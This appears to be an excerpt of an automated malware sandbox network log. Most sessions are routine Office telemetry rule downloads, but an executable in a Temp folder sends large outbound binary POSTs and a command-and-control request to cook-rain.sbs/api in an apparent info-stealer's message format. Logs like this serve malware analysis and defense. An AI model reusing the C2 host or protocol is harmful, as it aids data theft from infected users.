                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:48 UTC15331OUTData Raw: 37 09 ee 44 13 69 b9 50 a4 87 ff ba 23 2e 6f e9 47 bd 49 cc 2d 0c 77 b7 a3 67 5a d4 f4 c1 b3 d9 1e 19 e1 1c 8e 2f 0e 2e 78 e6 2f 5f d2 df 11 45 7e ec 8a 2a 34 ce 60 e4 5d c1 dd 49 dc 9d d9 13 bd d4 06 80 80 2c 14 86 8a c8 85 01 de 8c 18 bd 1f 8d 20 32 19 4e 10 73 c3 c9 46 fc 78 5f ff 6b bf 2c 44 be 21 d8 b3 f5 bf 22 e4 ff 75 53 c6 71 8e f2 34 07 40 f9 26 0f 3b cf 9d cd 69 a7 a0 58 e4 cf 0f 1e ce 94 dd cc f3 21 52 6a 1f b6 66 5e e3 05 87 d5 f9 60 04 c8 b8 be a6 43 fa af fd 90 10 8b c7 72 1d dd 6e f5 9b 93 da da 7c fc ed 41 9d 55 c9 99 a0 3c a1 51 2c 38 0b d9 73 01 b3 55 84 96 cb 0d 19 48 99 5e 44 da 87 f3 47 08 4f 5d f3 53 03 ce e8 95 6b 13 bd 95 c8 2d f9 39 14 e8 d2 8b 18 1a 1f 20 b7 5f cc 6c 8c 10 1a 3b 7d 25 0d 92 12 3c 02 e7 58 18 7d 46 d2 15 05 12 fb
                                                                                                                                                                                                                                                                                                            Data Ascii: 7DiP#.oGI-wgZ/.x/_E~*4`]I, 2NsFx_k,D!"uSq4@&;iX!Rjf^`Crn|AU<Q,8sUH^DGO]Sk-9 _l;}%<X}F
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:48 UTC15331OUTData Raw: e5 15 28 ca ba 36 e2 91 80 45 f7 7a 80 9c a4 c2 a7 ef ea 76 27 22 a0 3d ed 44 92 67 8d 6c 0d 69 cf a9 94 0b 82 75 c2 40 b3 5b 88 14 bf 29 f6 13 d6 e9 f2 c2 65 d6 23 fb e2 ee 35 d9 36 2b e3 fd fb f1 b9 6f 60 49 e7 e4 3d 60 64 0c e0 65 79 a6 bb 35 20 b8 32 b1 fb b7 d3 58 4d a6 44 61 ee 31 58 9c ff 52 ea 7e fc 31 d8 5f a9 14 17 8c 2c 45 6a b3 f4 c3 2a 67 4e 4f 93 2d b1 f3 47 eb 15 b1 4d 8c ec cc d2 78 c0 e3 e4 c4 39 cc 32 42 68 1e c6 5c 7f 76 98 5d a4 e2 a9 e9 cb 39 c1 fe 1e 48 d1 fc 08 da 1a 83 bb 96 9b aa 67 78 f6 2d 99 bf 35 4f 42 e2 11 54 ed 3d 38 5c 92 8a a9 42 7a 98 7e 0b aa 44 a0 61 48 29 60 66 f4 87 2b d7 f1 8c 43 76 48 c6 68 51 92 8e 72 f0 22 a7 88 89 3d 3e 8c e9 8a a1 e2 f7 f6 db 72 c6 a1 5a 85 ca a7 a4 71 3d 18 b4 5b a7 05 e3 b7 3a 69 56 f8 8a 45
                                                                                                                                                                                                                                                                                                            Data Ascii: (6Ezv'"=Dgliu@[)e#56+o`I=`dey5 2XMDa1XR~1_,Ej*gNO-GMx92Bh\v]9Hgx-5OBT=8\Bz~DaH)`f+CvHhQr"=>rZq=[:iVE
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:48 UTC15331OUTData Raw: 5f c0 88 f9 5d 43 3b 49 ff fa 42 37 04 f0 ad 5f 3c cd 7b 14 86 1e 5c a7 50 c2 1e 4b d4 47 be 6c da 1d 54 d9 c1 e3 10 8f 6a 10 cd 61 b8 fd 5b 14 1e b9 58 ae 03 e7 7b 2f 5f 84 cd 10 40 4a a7 2e 37 25 2b 67 7d d2 66 b4 c2 88 b3 13 1d 62 a4 1a 93 2f 21 e5 d8 00 89 4a f9 23 50 fb 49 21 06 db 5f 2f 19 0a 15 dc 7a 1d 4f b3 d5 01 10 27 e1 33 67 b9 2f 37 74 fd bb 7d 82 34 b0 ac 9e 7e cc 0f e6 f4 61 03 4a 20 f8 10 92 02 31 86 a3 44 40 63 11 65 af 6e ef 07 17 72 c9 d2 fb 77 ed 5f 57 ed 1e d8 0d 0f 0d c0 58 03 de ad 67 3c 6a 36 27 00 90 cb 06 4b 51 f2 8f 8d de dd b8 c5 09 74 b9 4a b1 1a 4e 25 81 a2 b4 e1 99 a6 bc 8f 3a 26 24 34 cf 0d 01 af 61 1d 0b 0f 97 d9 8f 5c ec 82 41 af 71 11 d2 62 46 60 74 ea dd d5 f6 bd 71 ea 23 59 72 88 bb 3e 96 d4 8c a0 d6 1f 22 3c 2d bd b2
                                                                                                                                                                                                                                                                                                            Data Ascii: _]C;IB7_<{\PKGlTja[X{/_@J.7%+g}fb/!J#PI!_/zO'3g/7t}4~aJ 1D@cenrw_WXg<j6'KQtJN%:&$4a\AqbF`tq#Yr>"<-
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:48 UTC15331OUTData Raw: d7 41 d1 3f 25 6f d4 fc 3d a4 d5 de b5 31 58 7d 33 5c 90 77 7e cf c3 80 b6 4b 98 e7 26 61 39 15 01 b7 0a 6f fc 79 6e b1 3b fc fc 69 60 0e 6a 8b 1e 7e f5 b1 19 55 a5 29 26 1c 50 ef d3 05 46 bf 76 07 ad 04 2c e2 56 75 be 0e 0a 84 84 87 2f 0c 0e f9 20 d8 50 8f 52 69 f1 b2 db 9c 4c 45 19 af c6 27 63 b2 a8 61 ac 9b 92 fa 73 b3 6a 7e 3a 86 c3 74 33 5e bc 38 c5 9c 6e b9 8b 00 c6 26 e9 41 3f 16 af 6f bd 32 e2 45 23 f5 c3 d9 fd 25 5f 33 fb f5 63 b1 07 a8 2a ec b1 c3 e9 a7 3f 32 3d de 87 74 b4 41 b7 37 93 7f 0a 59 b2 66 92 f9 4b de 9b b8 a7 5a 9f 50 a3 df bf fc 68 f8 09 68 a9 3c bc f1 8f dd e3 f4 fc 73 42 ac e1 3d d0 76 76 6f d5 34 9f a2 ec c6 9c e1 86 8c ed 8a 9d 46 81 f9 a2 ee cb ce 8b 4e ab ba 31 dc cd 9c a1 a2 04 d6 96 8e 10 d9 95 74 b8 ea 61 35 e7 0c f4 ca 7f
                                                                                                                                                                                                                                                                                                            Data Ascii: A?%o=1X}3\w~K&a9oyn;i`j~U)&PFv,Vu/ PRiLE'casj~:t3^8n&A?o2E#%_3c*?2=tA7YfKZPhh<sB=vvo4FN1ta5
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:48 UTC15331OUTData Raw: 7b 5b fe 08 ea 7a 8b c4 2f 02 4c f5 85 eb 28 b6 34 28 7d 82 4c e9 b1 21 76 bd 42 3d 57 fa 6d c7 ca a6 3c 16 1f ef 14 06 51 9b 25 9f c2 ed de cd 25 32 12 c7 c4 e7 f4 45 42 d7 38 ce d2 60 dd 4d 1d 10 55 08 cc 89 f5 ac bd b6 6e 02 12 02 08 d9 d3 67 d9 26 7e 50 e9 5d ac cf d3 74 e9 db 0e 96 19 4e d9 46 c2 c2 b0 cd 70 55 54 c8 d9 6f d5 97 1f 28 85 7b 6e 96 24 90 d1 d1 06 3c 31 71 17 93 37 cd 8c 51 61 c6 46 88 1c f6 52 75 0a a6 51 af c0 22 34 e8 a9 fa 66 a3 f6 61 66 93 e0 88 09 c9 5c bb 69 b9 4d 4d 5b 95 91 ca cb 9e a7 12 30 0f b1 05 d2 a1 ee 9f 92 0b 12 75 c0 8c c1 08 a7 82 69 8c 9c 3b 40 36 56 d4 9f 12 b3 44 47 96 61 c4 85 5f 2a c2 b8 cd 76 48 4f ad c0 16 52 e9 0b 4b 5d 93 c9 74 d6 7b af c9 d8 83 6d 1c a5 c4 2f 1f 58 bf 3b 24 26 84 f6 fb 7d a8 03 10 d3 c2 2f
                                                                                                                                                                                                                                                                                                            Data Ascii: {[z/L(4(}L!vB=Wm<Q%%2EB8`MUng&~P]tNFpUTo({n$<1q7QaFRuQ"4faf\iMM[0ui;@6VDGa_*vHORK]t{m/X;$&}/
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:48 UTC15331OUTData Raw: 0d 35 fd cd f2 fd db 5d 88 22 d6 73 d5 86 4c 1f 4e 6d c6 b1 9f af 57 9e 67 af df 49 cb 5a 1c 9c 3f 5f 30 18 ec be e4 1b 51 53 3b 3d 7a 72 5c 9f f9 52 f6 89 c2 68 80 df 68 88 8a 70 df 89 a0 fa c8 a7 dc 65 52 88 3e 33 c2 12 19 92 d8 cd e8 1b 5e db 49 63 fa 66 70 22 0e b8 be 6d ac 3d 5f f0 8e a1 1f 52 76 8a 3d b8 e8 7e ab c4 5c f6 b8 c9 97 86 f7 77 b3 6e cd 18 16 04 e0 f3 3a a7 cd 31 0b 9f ec c8 e7 6d 72 13 6a 9e 0a 0e 6d 34 48 0d f7 19 36 b8 e1 17 e6 f1 ac 7b 24 19 3f fb 0a 4b 8b 60 37 7f 58 cb 64 e5 8f 9c da 09 e2 47 3f 43 54 22 43 a3 68 87 50 03 1f b8 09 fd 05 7f 0e fe e7 3e 8b 8d 57 0e 9a f0 78 c7 ca df 26 a7 61 24 64 26 8d 32 0d a0 53 df cf 99 4c b0 b8 86 73 37 92 d9 8b 0a e0 91 c9 d3 dd 21 a2 8a 70 f2 da 4f 40 70 73 18 36 bb db d0 80 86 13 83 8d c6 aa
                                                                                                                                                                                                                                                                                                            Data Ascii: 5]"sLNmWgIZ?_0QS;=zr\RhhpeR>3^Icfp"m=_Rv=~\wn:1mrjm4H6{$?K`7XdG?CT"ChP>Wx&a$d&2SLs7!pO@ps6
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:54 UTC990INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:53 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=39fvk4p68daggtaavd7p4n9eo5; expires=Mon, 17-Mar-2025 04:57:29 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wymiq4MfkJvthc0eR6Ahzt8F0RzJSF6hJ1LLt3WjiqTKGcIAP71kGZZ9JKyJh9v%2FO6StpbLVtYrBQ3%2FR3499lHteBkSH%2FLoBLLZSOV6pZJEfCt%2FlxG9gRfkoEtat3hZ2"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                                                            CF-RAY: 8e603c400bb3426b-EWR
                                                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1732&sent=360&recv=606&lost=0&retrans=0&sent_bytes=2828&recv_bytes=582682&delivery_rate=1650650&cwnd=232&unsent_bytes=0&cid=0cb3049d3c0461e1&ts=5946&x=0"


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            119192.168.2.44986513.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:48 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:48 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:48 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1399
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE8C605FF"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 5c785bae-401e-0083-638c-3a075c000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111048Z-1777c6cb754dqb2khC1TEBmk1s0000000aw000000000fkef
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:48 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            120192.168.2.44986413.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:48 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:48 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:48 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1366
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BDF1E2608"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: de6f427f-801e-00ac-4ba5-3bfd65000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111048Z-r1d97b9957789nh9hC1TEBxha80000000aa000000000d10y
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:48 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            121192.168.2.44986813.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:49 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:50 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:49 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1362
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BDF497570"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 06e9cdc8-b01e-0002-45ce-3b1b8f000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111049Z-178bfbc474bmqmgjhC1NYCy16c00000001e00000000081w9
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:50 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            122192.168.2.44986913.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:49 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:50 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:49 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1403
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BDC2EEE03"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: f909f157-c01e-0049-018c-3aac27000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111049Z-1777c6cb754mqztshC1TEB4mkc0000000b1g000000008k60
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:50 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            123192.168.2.449874188.114.96.34432896C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:50 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                            Content-Length: 53
                                                                                                                                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:50 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:50 UTC986INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:50 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=912kkefguuvlp8guh46qhlgqfq; expires=Mon, 17-Mar-2025 04:57:29 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6r%2BkeV%2BNddIFdDYO%2BDfzQjBYUTKlUskDDiyDMoUY8z6AXEThtdve%2F%2BT4FNzeF%2BgGIlUdhPDzgv8LkvJJIK6ixNipR3uwrFsTNWHsxXdMGlqO578jvqbFA0idNyGZqYMq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                                                            CF-RAY: 8e603c4d1a3a3320-EWR
                                                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1812&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=950&delivery_rate=1593016&cwnd=252&unsent_bytes=0&cid=143a0ea9feb9b921&ts=800&x=0"
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:50 UTC383INData Raw: 34 34 36 63 0d 0a 6c 50 39 53 39 32 51 6b 54 54 58 63 45 41 43 4a 34 78 45 41 62 78 4b 54 30 6d 48 68 56 71 5a 6f 39 71 55 49 41 57 4a 44 52 32 44 76 33 53 54 56 58 68 42 68 46 36 39 31 49 72 4f 58 59 33 55 4b 50 72 47 7a 42 63 4e 73 77 41 6d 61 31 6d 30 74 51 44 55 71 51 71 36 5a 4d 35 73 58 51 57 45 58 75 57 67 69 73 37 68 71 49 67 70 38 73 65 68 44 68 44 7a 45 43 5a 72 48 61 57 6f 4e 4d 79 73 44 2f 4a 4d 31 6e 77 46 48 4b 56 53 77 66 57 58 73 68 6e 42 71 41 58 76 2b 75 67 7a 44 65 6f 51 4e 6a 49 63 79 49 79 38 6d 4d 77 48 5a 6e 69 47 63 52 6c 6c 68 54 76 35 31 62 71 76 5a 4d 32 45 4b 63 50 2b 30 42 59 6f 2b 7a 67 43 53 78 6d 78 72 45 69 6f 68 43 50 79 64 4e 70 34 4c 54 6a 31 5a 75 6e 70 75 36 6f 78 77 49 6b 4d 77 39 71 68 44 32 33 53 58 4f 4a 66 57 65
